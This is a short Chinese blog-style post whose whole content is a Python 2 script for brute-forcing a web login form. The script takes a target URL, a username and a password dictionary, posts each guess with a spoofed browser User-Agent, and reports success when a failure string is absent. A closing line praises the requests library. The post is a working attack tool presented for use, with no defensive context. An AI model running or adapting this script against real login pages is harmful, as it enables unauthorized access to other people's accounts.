登陆表单破解2

#! /usr/bin/env python
# coding:utf-8
'''
暴力破解登陆表单
date: 2017/3/13
参数: 脚本名 登陆地址 用户名 密码字典 登陆失败特征字符
'''
import requests, sys
if len(sys.argv) != 5:
    print u'''
    Usage: brute.py http:127.0.0.1/login.php admin pwd.txt failed
    '''
    sys.exit()

url = sys.argv[1]
username = sys.argv[2]
pwdPtah = sys.argv[3]
identify = sys.argv[4]

for password in open(pwdPtah).readlines():
    password = password.strip('\n')
    data = {
        'user': username,
        'passwd': password
    }
    headers = {
        'UserAgent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3004.3 Safari/537.36',
        'AcceptEncoding': 'gzip, deflate, sdch'
    }
    print u'正在尝试 %s:%s' % (username, password)
    res = requests.post(url, data=data, headers=headers)
    if res.text.find(identify) == -1:
        print u'破解成功,密码为: %s' % password
        break

这次用requests库写的,感觉比Urllib2要方便和强大些